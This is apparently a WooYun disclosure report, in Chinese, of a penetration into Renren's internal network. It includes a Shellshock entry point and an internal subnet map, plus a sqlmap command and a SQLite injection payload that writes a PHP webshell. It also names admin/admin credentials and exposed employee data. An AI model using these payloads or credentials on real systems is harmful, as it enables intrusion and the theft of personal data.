WooYun.org

target：http://118.186.217.122/
存在shellshock：http://118.186.217.122/cgi-bin/test-cgi
简单getshell后开始收集信息

确认主机在内网
查看hosts确认其他网段
10.4.24.0/24
10.3.17.0/24
10.3.16.0/24
10.3.23.0/24
10.5.16.0/24
其中
10.22.160.0/24
10.22.198.0/24
是数据段
10.7.2.0/24
10.2.10.0/24
10.2.15.0/24
是内部业务段
常规的代理流量进入内网探测性扫描
http://10.4.24.136/source/ 应该是对方的代码托管平台，基本上全线业务都在上面且没有认证即可查看下载，导致全线业务代码泄漏
<img src="http://m1.yea.im/1pA.png" alt="" />
<img src="http://m1.yea.im/1pB.png" alt="" />

mail.renren-inc.com	10.7.2.18
meeting.renren-inc.com	10.2.10.23
library.renren-inc.com	10.2.10.24
we.renren-inc.com	10.2.15.80
soft.opi-corp.com	10.2.15.42
renren-inc.com 		10.7.2.12

根据之前的扫描结果，直接对内部业务段进行渗透
we.renren-inc.com/tongxunlu/
应用存在注入，sqlite的数据库，影响全体员工数据

proxychains -q sqlmap -u "http://we.renren-inc.com/tongxunlu/addressListNote.php?id=1027*"

可getshell，然而有个坑点需要编码处理

;ATTACH+DATABASE 'ztz.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (X'3c3f7068702073797374656d28245f524551554553545b615d293b203f3e');--

如此，可getshell
<img src="http://m1.yea.im/1pE.png" alt="" />
在此之前已有其他黑客入侵，请自查
<img src="http://m1.yea.im/1pF.png" alt="" />
其他还有诸如目录遍历，内部业务后台弱口令等等
http://we.renren-inc.com/tongxunlu/admin
admin/admin
http://we.renren-inc.com/tongxunlu/App_Data/
可直接下载所有员工数据
正要深入用户数据和办公段渗透时，外部业务下线了，但是全盘渗透仅仅只是时间问题，不再做敏感攻击